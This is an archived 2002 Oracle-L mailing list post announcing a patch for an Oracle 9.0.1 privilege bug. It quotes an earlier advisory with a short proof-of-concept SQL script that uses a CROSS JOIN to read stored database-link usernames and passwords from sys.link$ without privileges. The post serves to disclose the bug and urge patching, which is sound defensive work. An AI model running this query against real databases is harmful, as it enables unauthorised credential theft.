| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Mailing Lists -> Oracle-L -> Re: Security Hole
For those of you with Metalink access,
there is now a patch to this bug for 9.0.1.3
Patch number is 2121935.
Platforms covered are:
HP 9000 series HP-UX 64-bit
Sun Sparc Solaris 64-bit
IBM RS/6000 64-bit
Sun Sparc Solaris
Digital Alpha OpenVMS
LINUX Intel
Compaq Tur64 UNIX
Jonathan Lewis
http://www.jlcomp.demon.co.uk
Author of:
Practical Oracle 8i: Building Efficient Databases
Next Seminar - Australia - July/August
http://www.jlcomp.demon.co.uk/seminar.html
Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html
-----Original Message-----
To: ORACLE-L_at_fatcity.com <ORACLE-L_at_fatcity.com>
Date: 16 April 2002 11:37
|This just in from comp.databases.oracle.server.
|
|See metalink bug 2121935.
|
|Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
|allows you to view data from tables on which you have no
|privilege. For example, try this COMPLETE script:
|
|connect / as sysdba
|create user us1 identified by us1;
|grant create session to us1;
|
|connect us1/us1
|
|select userid, password
|from
| sys.link$ cross join dual
|;
|
|
|
|Worse still, if you have the privilege to create views
|then this loophole allows you to seek and destroy
|ANY DATA in the database that you might want to.
|
|The bug is fixed in 9iR2. I didn't see any note
|about a backport, or a security alert on OTN.
|
|Conclusion:
|
| 9.0.1 should not be in use on production system
| until Oracle supplies a fix.
|
|
|
|Jonathan Lewis
|http://www.jlcomp.demon.co.uk
|
|Author of:
|Practical Oracle 8i: Building Efficient Databases
|
|Next Seminar - Australia - July/August
|http://www.jlcomp.demon.co.uk/seminar.html
|
|Host to The Co-Operative Oracle Users' FAQ
|http://www.jlcomp.demon.co.uk/faq/ind_faq.html
|
|
|
|
-- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: jonathan_at_jlcomp.demon.co.uk Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).Received on Thu Apr 18 2002 - 06:48:17 CDT
 |
 |